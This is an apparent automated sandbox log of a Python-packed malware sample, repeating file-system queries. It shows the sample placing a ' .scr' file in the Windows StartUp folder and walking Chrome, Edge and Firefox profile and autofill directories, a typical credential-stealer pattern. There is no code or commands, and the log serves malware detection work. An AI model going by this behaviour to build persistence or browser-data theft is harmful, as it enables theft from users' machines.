              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\c7615543-0de7-4eea-9862-59688b7f430d VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
